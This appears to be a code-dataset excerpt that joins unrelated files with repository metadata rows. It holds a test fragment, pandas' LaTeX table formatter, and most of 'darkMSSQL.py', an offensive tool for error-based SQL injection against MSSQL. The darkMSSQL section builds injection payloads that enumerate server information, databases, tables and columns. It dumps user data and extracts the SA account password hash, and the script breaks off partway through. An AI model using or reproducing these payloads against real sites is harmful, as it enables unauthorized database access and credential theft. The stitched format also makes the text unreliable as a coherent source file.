self.assertEqual(Item.STAGED, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=2))
check_count(8)
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
| mit | 145,492,830,655,224,130 | 42.417526 | 118 | 0.642052 | false | 3.663767 | true | false | false |
gfyoung/pandas | pandas/io/formats/latex.py | 2 | 25201 | """
Module for formatting output data in Latex.
"""
from abc import ABC, abstractmethod
from typing import Iterator, List, Optional, Sequence, Tuple, Type, Union
import numpy as np
from pandas.core.dtypes.generic import ABCMultiIndex
from pandas.io.formats.format import DataFrameFormatter
def _split_into_full_short_caption(
caption: Optional[Union[str, Tuple[str, str]]]
) -> Tuple[str, str]:
"""Extract full and short captions from caption string/tuple.
Parameters
----------
caption : str or tuple, optional
Either table caption string or tuple (full_caption, short_caption).
If string is provided, then it is treated as table full caption,
while short_caption is considered an empty string.
Returns
-------
full_caption, short_caption : tuple
Tuple of full_caption, short_caption strings.
"""
if caption:
if isinstance(caption, str):
full_caption = caption
short_caption = ""
else:
try:
full_caption, short_caption = caption
except ValueError as err:
msg = "caption must be either a string or a tuple of two strings"
raise ValueError(msg) from err
else:
full_caption = ""
short_caption = ""
return full_caption, short_caption
class RowStringConverter(ABC):
r"""Converter for dataframe rows into LaTeX strings.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
multicolumn: bool, optional
Whether to use \multicolumn macro.
multicolumn_format: str, optional
Multicolumn format.
multirow: bool, optional
Whether to use \multirow macro.
"""
def __init__(
self,
formatter: DataFrameFormatter,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.clinebuf: List[List[int]] = []
self.strcols = self._get_strcols()
self.strrows = list(zip(*self.strcols))
def get_strrow(self, row_num: int) -> str:
"""Get string representation of the row."""
row = self.strrows[row_num]
is_multicol = (
row_num < self.column_levels and self.fmt.header and self.multicolumn
)
is_multirow = (
row_num >= self.header_levels
and self.fmt.index
and self.multirow
and self.index_levels > 1
)
is_cline_maybe_required = is_multirow and row_num < len(self.strrows) - 1
crow = self._preprocess_row(row)
if is_multicol:
crow = self._format_multicolumn(crow)
if is_multirow:
crow = self._format_multirow(crow, row_num)
lst = []
lst.append(" & ".join(crow))
lst.append(" \\\\")
if is_cline_maybe_required:
cline = self._compose_cline(row_num, len(self.strcols))
lst.append(cline)
return "".join(lst)
@property
def _header_row_num(self) -> int:
"""Number of rows in header."""
return self.header_levels if self.fmt.header else 0
@property
def index_levels(self) -> int:
"""Integer number of levels in index."""
return self.frame.index.nlevels
@property
def column_levels(self) -> int:
return self.frame.columns.nlevels
@property
def header_levels(self) -> int:
nlevels = self.column_levels
if self.fmt.has_index_names and self.fmt.show_index_names:
nlevels += 1
return nlevels
def _get_strcols(self) -> List[List[str]]:
"""String representation of the columns."""
if self.fmt.frame.empty:
strcols = [[self._empty_info_line]]
else:
strcols = self.fmt.get_strcols()
# reestablish the MultiIndex that has been joined by get_strcols()
if self.fmt.index and isinstance(self.frame.index, ABCMultiIndex):
out = self.frame.index.format(
adjoin=False,
sparsify=self.fmt.sparsify,
names=self.fmt.has_index_names,
na_rep=self.fmt.na_rep,
)
# index.format will sparsify repeated entries with empty strings
# so pad these with some empty space
def pad_empties(x):
for pad in reversed(x):
if pad:
break
return [x[0]] + [i if i else " " * len(pad) for i in x[1:]]
gen = (pad_empties(i) for i in out)
# Add empty spaces for each column level
clevels = self.frame.columns.nlevels
out = [[" " * len(i[-1])] * clevels + i for i in gen]
# Add the column names to the last index column
cnames = self.frame.columns.names
if any(cnames):
new_names = [i if i else "{}" for i in cnames]
out[self.frame.index.nlevels - 1][:clevels] = new_names
# Get rid of old multiindex column and add new ones
strcols = out + strcols[1:]
return strcols
@property
def _empty_info_line(self):
return (
f"Empty {type(self.frame).__name__}\n"
f"Columns: {self.frame.columns}\n"
f"Index: {self.frame.index}"
)
def _preprocess_row(self, row: Sequence[str]) -> List[str]:
"""Preprocess elements of the row."""
if self.fmt.escape:
crow = _escape_symbols(row)
else:
crow = [x if x else "{}" for x in row]
if self.fmt.bold_rows and self.fmt.index:
crow = _convert_to_bold(crow, self.index_levels)
return crow
def _format_multicolumn(self, row: List[str]) -> List[str]:
r"""
Combine columns belonging to a group to a single multicolumn entry
according to self.multicolumn_format
e.g.:
a & & & b & c &
will become
\multicolumn{3}{l}{a} & b & \multicolumn{2}{l}{c}
"""
row2 = row[: self.index_levels]
ncol = 1
coltext = ""
def append_col():
# write multicolumn if needed
if ncol > 1:
row2.append(
f"\\multicolumn{{{ncol:d}}}{{{self.multicolumn_format}}}"
f"{{{coltext.strip()}}}"
)
# don't modify where not needed
else:
row2.append(coltext)
for c in row[self.index_levels :]:
# if next col has text, write the previous
if c.strip():
if coltext:
append_col()
coltext = c
ncol = 1
# if not, add it to the previous multicolumn
else:
ncol += 1
# write last column name
if coltext:
append_col()
return row2
def _format_multirow(self, row: List[str], i: int) -> List[str]:
r"""
Check following rows, whether row should be a multirow
e.g.: becomes:
a & 0 & \multirow{2}{*}{a} & 0 &
& 1 & & 1 &
b & 0 & \cline{1-2}
b & 0 &
"""
for j in range(self.index_levels):
if row[j].strip():
nrow = 1
for r in self.strrows[i + 1 :]:
if not r[j].strip():
nrow += 1
else:
break
if nrow > 1:
# overwrite non-multirow entry
row[j] = f"\\multirow{{{nrow:d}}}{{*}}{{{row[j].strip()}}}"
# save when to end the current block with \cline
self.clinebuf.append([i + nrow - 1, j + 1])
return row
def _compose_cline(self, i: int, icol: int) -> str:
"""
Create clines after multirow-blocks are finished.
"""
lst = []
for cl in self.clinebuf:
if cl[0] == i:
lst.append(f"\n\\cline{{{cl[1]:d}-{icol:d}}}")
# remove entries that have been written to buffer
self.clinebuf = [x for x in self.clinebuf if x[0] != i]
return "".join(lst)
class RowStringIterator(RowStringConverter):
"""Iterator over rows of the header or the body of the table."""
@abstractmethod
def __iter__(self) -> Iterator[str]:
"""Iterate over LaTeX string representations of rows."""
class RowHeaderIterator(RowStringIterator):
"""Iterator for the table header rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num < self._header_row_num:
yield self.get_strrow(row_num)
class RowBodyIterator(RowStringIterator):
"""Iterator for the table body rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num >= self._header_row_num:
yield self.get_strrow(row_num)
class TableBuilderAbstract(ABC):
"""
Abstract table builder producing string representation of LaTeX table.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
column_format: str, optional
Column format, for example, 'rcl' for three columns.
multicolumn: bool, optional
Use multicolumn to enhance MultiIndex columns.
multicolumn_format: str, optional
The alignment for multicolumns, similar to column_format.
multirow: bool, optional
Use multirow to enhance MultiIndex rows.
caption: str, optional
Table caption.
short_caption: str, optional
Table short caption.
label: str, optional
LaTeX label.
position: str, optional
Float placement specifier, for example, 'htb'.
"""
def __init__(
self,
formatter: DataFrameFormatter,
column_format: Optional[str] = None,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
caption: Optional[str] = None,
short_caption: Optional[str] = None,
label: Optional[str] = None,
position: Optional[str] = None,
):
self.fmt = formatter
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption = caption
self.short_caption = short_caption
self.label = label
self.position = position
def get_result(self) -> str:
"""String representation of LaTeX table."""
elements = [
self.env_begin,
self.top_separator,
self.header,
self.middle_separator,
self.env_body,
self.bottom_separator,
self.env_end,
]
result = "\n".join([item for item in elements if item])
trailing_newline = "\n"
result += trailing_newline
return result
@property
@abstractmethod
def env_begin(self) -> str:
"""Beginning of the environment."""
@property
@abstractmethod
def top_separator(self) -> str:
"""Top level separator."""
@property
@abstractmethod
def header(self) -> str:
"""Header lines."""
@property
@abstractmethod
def middle_separator(self) -> str:
"""Middle level separator."""
@property
@abstractmethod
def env_body(self) -> str:
"""Environment body."""
@property
@abstractmethod
def bottom_separator(self) -> str:
"""Bottom level separator."""
@property
@abstractmethod
def env_end(self) -> str:
"""End of the environment."""
class GenericTableBuilder(TableBuilderAbstract):
"""Table builder producing string representation of LaTeX table."""
@property
def header(self) -> str:
iterator = self._create_row_iterator(over="header")
return "\n".join(list(iterator))
@property
def top_separator(self) -> str:
return "\\toprule"
@property
def middle_separator(self) -> str:
return "\\midrule" if self._is_separator_required() else ""
@property
def env_body(self) -> str:
iterator = self._create_row_iterator(over="body")
return "\n".join(list(iterator))
def _is_separator_required(self) -> bool:
return bool(self.header and self.env_body)
@property
def _position_macro(self) -> str:
r"""Position macro, extracted from self.position, like [h]."""
return f"[{self.position}]" if self.position else ""
@property
def _caption_macro(self) -> str:
r"""Caption macro, extracted from self.caption.
With short caption:
\caption[short_caption]{caption_string}.
Without short caption:
\caption{caption_string}.
"""
if self.caption:
return "".join(
[
r"\caption",
f"[{self.short_caption}]" if self.short_caption else "",
f"{{{self.caption}}}",
]
)
return ""
@property
def _label_macro(self) -> str:
r"""Label macro, extracted from self.label, like \label{ref}."""
return f"\\label{{{self.label}}}" if self.label else ""
def _create_row_iterator(self, over: str) -> RowStringIterator:
"""Create iterator over header or body of the table.
Parameters
----------
over : {'body', 'header'}
Over what to iterate.
Returns
-------
RowStringIterator
Iterator over body or header.
"""
iterator_kind = self._select_iterator(over)
return iterator_kind(
formatter=self.fmt,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
)
def _select_iterator(self, over: str) -> Type[RowStringIterator]:
"""Select proper iterator over table rows."""
if over == "header":
return RowHeaderIterator
elif over == "body":
return RowBodyIterator
else:
msg = f"'over' must be either 'header' or 'body', but {over} was provided"
raise ValueError(msg)
class LongTableBuilder(GenericTableBuilder):
"""Concrete table builder for longtable.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = LongTableBuilder(formatter, caption='a long table',
... label='tab:long', column_format='lrl')
>>> table = builder.get_result()
>>> print(table)
\\begin{longtable}{lrl}
\\caption{a long table}
\\label{tab:long}\\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endfirsthead
\\caption[]{a long table} \\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endhead
\\midrule
\\multicolumn{3}{r}{{Continued on next page}} \\\\
\\midrule
\\endfoot
<BLANKLINE>
\\bottomrule
\\endlastfoot
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\end{longtable}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
first_row = (
f"\\begin{{longtable}}{self._position_macro}{{{self.column_format}}}"
)
elements = [first_row, f"{self._caption_and_label()}"]
return "\n".join([item for item in elements if item])
def _caption_and_label(self) -> str:
if self.caption or self.label:
double_backslash = "\\\\"
elements = [f"{self._caption_macro}", f"{self._label_macro}"]
caption_and_label = "\n".join([item for item in elements if item])
caption_and_label += double_backslash
return caption_and_label
else:
return ""
@property
def middle_separator(self) -> str:
iterator = self._create_row_iterator(over="header")
# the content between \endfirsthead and \endhead commands
# mitigates repeated List of Tables entries in the final LaTeX
# document when dealing with longtable environments; GH #34360
elements = [
"\\midrule",
"\\endfirsthead",
f"\\caption[]{{{self.caption}}} \\\\" if self.caption else "",
self.top_separator,
self.header,
"\\midrule",
"\\endhead",
"\\midrule",
f"\\multicolumn{{{len(iterator.strcols)}}}{{r}}"
"{{Continued on next page}} \\\\",
"\\midrule",
"\\endfoot\n",
"\\bottomrule",
"\\endlastfoot",
]
if self._is_separator_required():
return "\n".join(elements)
return ""
@property
def bottom_separator(self) -> str:
return ""
@property
def env_end(self) -> str:
return "\\end{longtable}"
class RegularTableBuilder(GenericTableBuilder):
"""Concrete table builder for regular table.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = RegularTableBuilder(formatter, caption='caption', label='lab',
... column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{table}
\\centering
\\caption{caption}
\\label{lab}
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
\\end{table}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
elements = [
f"\\begin{{table}}{self._position_macro}",
"\\centering",
f"{self._caption_macro}",
f"{self._label_macro}",
f"\\begin{{tabular}}{{{self.column_format}}}",
]
return "\n".join([item for item in elements if item])
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\n".join(["\\end{tabular}", "\\end{table}"])
class TabularBuilder(GenericTableBuilder):
"""Concrete table builder for tabular environment.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = TabularBuilder(formatter, column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
return f"\\begin{{tabular}}{{{self.column_format}}}"
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\\end{tabular}"
class LatexFormatter:
r"""
Used to render a DataFrame to a LaTeX tabular/longtable environment output.
Parameters
----------
formatter : `DataFrameFormatter`
longtable : bool, default False
Use longtable environment.
column_format : str, default None
The columns format as specified in `LaTeX table format
<https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g 'rcl' for 3 columns
multicolumn : bool, default False
Use \multicolumn to enhance MultiIndex columns.
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
multirow : bool, default False
Use \multirow to enhance MultiIndex rows.
caption : str or tuple, optional
Tuple (full_caption, short_caption),
which results in \caption[short_caption]{full_caption};
if a single string is passed, no short caption will be set.
label : str, optional
The LaTeX label to be placed inside ``\label{}`` in the output.
position : str, optional
The LaTeX positional argument for tables, to be placed after
``\begin{}`` in the output.
See Also
--------
HTMLFormatter
"""
def __init__(
self,
formatter: DataFrameFormatter,
longtable: bool = False,
column_format: Optional[str] = None,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
caption: Optional[Union[str, Tuple[str, str]]] = None,
label: Optional[str] = None,
position: Optional[str] = None,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.longtable = longtable
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption, self.short_caption = _split_into_full_short_caption(caption)
self.label = label
self.position = position
def to_string(self) -> str:
"""
Render a DataFrame to a LaTeX tabular, longtable, or table/tabular
environment output.
"""
return self.builder.get_result()
@property
def builder(self) -> TableBuilderAbstract:
"""Concrete table builder.
Returns
-------
TableBuilder
"""
builder = self._select_builder()
return builder(
formatter=self.fmt,
column_format=self.column_format,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
caption=self.caption,
short_caption=self.short_caption,
label=self.label,
position=self.position,
)
def _select_builder(self) -> Type[TableBuilderAbstract]:
"""Select proper table builder."""
if self.longtable:
return LongTableBuilder
if any([self.caption, self.label, self.position]):
return RegularTableBuilder
return TabularBuilder
@property
def column_format(self) -> Optional[str]:
"""Column format."""
return self._column_format
@column_format.setter
def column_format(self, input_column_format: Optional[str]) -> None:
"""Setter for column format."""
if input_column_format is None:
self._column_format = (
self._get_index_format() + self._get_column_format_based_on_dtypes()
)
elif not isinstance(input_column_format, str):
raise ValueError(
f"column_format must be str or unicode, "
f"not {type(input_column_format)}"
)
else:
self._column_format = input_column_format
def _get_column_format_based_on_dtypes(self) -> str:
"""Get column format based on data type.
Right alignment for numbers and left - for strings.
"""
def get_col_type(dtype):
if issubclass(dtype.type, np.number):
return "r"
return "l"
dtypes = self.frame.dtypes._values
return "".join(map(get_col_type, dtypes))
def _get_index_format(self) -> str:
"""Get index column format."""
return "l" * self.frame.index.nlevels if self.fmt.index else ""
def _escape_symbols(row: Sequence[str]) -> List[str]:
"""Carry out string replacements for special symbols.
Parameters
----------
row : list
List of string, that may contain special symbols.
Returns
-------
list
list of strings with the special symbols replaced.
"""
return [
(
x.replace("\\", "\\textbackslash ")
.replace("_", "\\_")
.replace("%", "\\%")
.replace("$", "\\$")
.replace("#", "\\#")
.replace("{", "\\{")
.replace("}", "\\}")
.replace("~", "\\textasciitilde ")
.replace("^", "\\textasciicircum ")
.replace("&", "\\&")
if (x and x != "{}")
else "{}"
)
for x in row
]
def _convert_to_bold(crow: Sequence[str], ilevels: int) -> List[str]:
"""Convert elements in ``crow`` to bold."""
return [
f"\\textbf{{{x}}}" if j < ilevels and x.strip() not in ["", "{}"] else x
for j, x in enumerate(crow)
]
if __name__ == "__main__":
import doctest
doctest.testmod()
| bsd-3-clause | 5,614,373,283,270,551,000 | 29.546667 | 86 | 0.550931 | false | 4.081795 | false | false | false |
knightmare2600/d4rkc0de | others/darkMSSQL.py | 1 | 20446 | #!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Share the c0de!
# darkc0de Crew
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, rechemen, c0mrade (r.i.p brotha), reverenddigitalx
# and the darkc0de crew
# Thanks to inkubus for helping me beta
# NOTES:
# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage caused! User assumes all responsibility
# Intended for authorized Web Application Pen Testing Only!
# BE WARNED, THIS TOOL IS VERY LOUD..
import sys, re, os, socket, urllib2, time, random, cookielib, string
#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|\n"
sys.exit(1)
#help option
for arg in sys.argv:
if arg == "-h":
print " Usage: ./darkMSSQL.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --info Gets MySQL server configuration only."
print "\tDefine: --dbs Shows all databases user has access too."
print "\tDefine: --schema Enumerate Information_schema Database."
print "\tDefine: --dump Extract information from a Database, Table and Column."
print "\tDefine: --insert Insert data into specified db, table and column(s)."
print "\n\tRequired:"
print "\tDefine: -u URL \"www.site.com/news.asp?id=2\" or \"www.site.com/index.asp?id=news'\""
print "\n\tMode dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default is darkMSSQLlog.txt"
print "\tDefine: -r \"-r 20\" this will make the script resume at row 20 during dumping"
print "\tDefine: --cookie \"cookie_file.txt\""
print "\tDefine: --debug Prints debug info to terminal."
print "\n Ex: ./darkMSSQL.py --info -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --dbs -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --schema -u \"www.site.com/news.asp?id=2\" -D dbname"
print " Ex: ./darkMSSQL.py --dump -u \"www.site.com/news.asp?id=2\" -D dbname -T tablename -C username,password"
print " Ex: ./darkMSSQL.py -u \"www.site.com/news.asp?news=article'\" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass"
print
sys.exit(1)
#define varablies
site = ""
dbt = "darkMSSQLlog.txt"
proxy = "None"
count = 0
basicinfo = ["@@VERSION","USER","DB_NAME()","HOST_NAME()",]#@@SERVERNAME] *SEVERNAME causes errors on some 2000 servers
db_num = 0
top_num = 0
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_insert = "None"
arg_debug = "off"
arg_cookie = "None"
col_url = ""
insert_url = ""
selected_col = ""
inserted_data = ""
mode = "None"
gets = 0
row_num = 0
#Check args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "--debug":
arg_debug = "on"
elif arg == "--cookie":
arg_cookie = sys.argv[count+1]
elif arg == "--insert":
mode = arg
arg_insert = sys.argv[count+1]
elif arg == "-r":
row_num = sys.argv[count+1]
top_num = sys.argv[count+1]
count+=1
#Title write
file = open(dbt, "a")
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|"
file.write("\n|------------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com v2.0 |")
file.write("\n| 10/2008 darkMSSQL.py |")
file.write("\n| -MSSQL Error Based Database Enumeration |")
file.write("\n| -MSSQL Server Information Enumeration |")
file.write("\n| -MSSQL Data Extractor |")
file.write("\n| Usage: darkMSSQL.py [options] |")
file.write("\n| [Public Beta] -h help darkc0de.com |")
file.write("\n|------------------------------------------------|")
#Arg Error Checking
if site == "":
print "\n[-] Must include -u flag and specify a mode."
print "[-] For help -h\n"
sys.exit(1)
if mode == "None":
print "\n[-] Mode must be specified --info, --dbs, --schema, --dump, --insert"
print "[-] For help -h\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "\n[-] Must include -D flag!"
print "[-] For Help -h\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "\n[-] You must include -D, -T and -C flag when --dump specified!"
print "[-] For help -h\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if site[:4] != "http":
site = "http://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')
if arg_cookie != "None":
try:
cj = cookielib.MozillaCookieJar()
cj.load(arg_cookie)
cookie_handler = urllib2.HTTPCookieProcessor(cj)
except:
print "[!] There was a problem loading your cookie file!"
print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
sys.exit(1)
else:
cookie_handler = urllib2.HTTPCookieProcessor()
if arg_columns != "None":
arg_columns = arg_columns.split(",")
for column in arg_columns:
col_url += "%2bconvert(varchar,isnull(convert(varchar,"+column+"),char(32)))%2bchar(58)"
if arg_insert != "None":
arg_insert = arg_insert.split(",")
#General Info
print "\n[+] URL:",site
file.write("\n\n[+] URL:"+site)
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Cookie:", arg_cookie
file.write("\n[+] Cookie: "+arg_cookie)
#Build proxy list
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
file.write("\n[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete"
file.write("\n[+] Proxy List Complete")
else:
print "[-] Proxy Not Given"
file.write("\n[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener(cookie_handler))
proxy_num = 0
proxy_len = len(proxy_list)
#URL Get Function
def GetTheShit(head_URL):
try:
if arg_debug == "on":
print "\n[debug]",head_URL
file.write("\n[debug] "+head_URL)
try:
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
except urllib2.HTTPError, e:
source = e.read()
match = re.findall("value '[\d\D]*' to",source)
match = match[0][7:-4]
return match
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
# Here are the modes!
if mode == "--info":
print "[+] Displaying information about MSSQL host!\n"
file.write("\n[+] Displaying information about MSSQL host!\n")
site_URL = site+"+or+1=convert(int,(darkc0de))--"
for baseinfo in basicinfo:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(baseinfo))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "[-] We seem to be having a problem! Check it out manually!"
print "[-] "+str(head_URL)
print "\n[-] Done"
sys.exit(1)
if baseinfo == "@@VERSION":
ver_info = the_juice
print "[+]",baseinfo+":",the_juice
file.write("\n[+] "+baseinfo+": "+the_juice)
print "\n[+] Script detected Microsoft SQL Version:",ver_info[21:26]
file.write("\n\n[+] Script detected Microsoft SQL Version: "+ver_info[21:26])
if ver_info[25] == "0":
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.dbo.fn_varbintohexstr(password)+from+master..sysxlogins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
else:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.sys.fn_varbintohexstr(password_hash)+from+master.sys.sql_logins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
print "[+] Checking to see if we can view password hashs...", yesno
file.write("\n[+] Checking to see if we can view password hashs... "+yesno)
if yesno != "Nope!":
print "[!] Dumping SA Account info:"
file.write("\n[!] Dumping SA Account info:")
print "\tUsername: SA"
file.write("\n\tUsername: SA")
print "\tSalt:",the_juice[6:14]
file.write("\n\tSalt: "+the_juice[6:14])
print "\tMixedcase:",the_juice[15:54]
file.write("\n\tMixedcase: "+the_juice[15:54])
print "\tUppercase:",the_juice[55:]
file.write("\n\tUppercase: "+the_juice[55:])
print "\tFull Hash:",the_juice
file.write("\n\tFull Hash: "+the_juice)
if mode == "--dbs":
print "[+] Displaying list of all databases on MSSQL host!\n"
file.write("\n[+] Displaying list of all databases on MSSQL host!\n")
while 1:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(DB_NAME(darkc0de)))--"
head_URL = head_URL.replace("darkc0de",str(db_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
db_num+=1;row_num+=1
if mode == "--schema":
#List Tables
if arg_database != "None" and arg_table == "None":
print "[+] Displaying tables inside DB: "+arg_database+"\n"
file.write("\n[+] Displaying tables inside DB: "+arg_database+"\n")
site_URL = site+"+or+1=convert(int,(select+top+1+table_name+from+"+arg_database+".information_schema.tables+where+table_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+table_name+FROM+"+arg_database+".information_schema.tables+ORDER+BY+table_name)+ORDER+BY+table_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this database!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
#List Columns
if arg_table != "None":
print "[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n"
file.write("\n[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n")
